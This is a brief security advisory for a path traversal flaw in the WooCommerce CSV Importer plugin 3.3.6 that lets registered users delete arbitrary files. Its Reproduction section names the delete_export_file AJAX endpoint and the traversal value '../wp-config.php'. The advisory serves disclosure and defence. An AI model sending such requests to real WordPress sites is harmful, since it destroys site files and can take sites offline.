WooCommerce CSV Importer Path Traversal Vulnerability Allowing Arbitrary File Deletion

A path traversal vulnerability has been identified in the WooCommerce CSV Importer plugin, specifically in version 3.3.6. This vulnerability allows registered users to delete arbitrary files by sending unescaped filenames through the delete_export_file AJAX action. Exploitation involves crafting POST requests with directory traversal sequences in the filename parameter, potentially leading to the deletion of sensitive files such as wp-config.php, outside the designated export directory.

Impact

Exploitation of this vulnerability could result in the unauthorized deletion of critical files, such as wp-config.php, which contains sensitive configuration information.

Reproduction

To reproduce this vulnerability, send a POST request to wp-admin/admin-ajax.php with the action parameter set to delete_export_file. Include a filename parameter that contains directory traversal sequences, such as '../wp-config.php'. This will trigger the deletion of the specified file, demonstrating the path traversal vulnerability.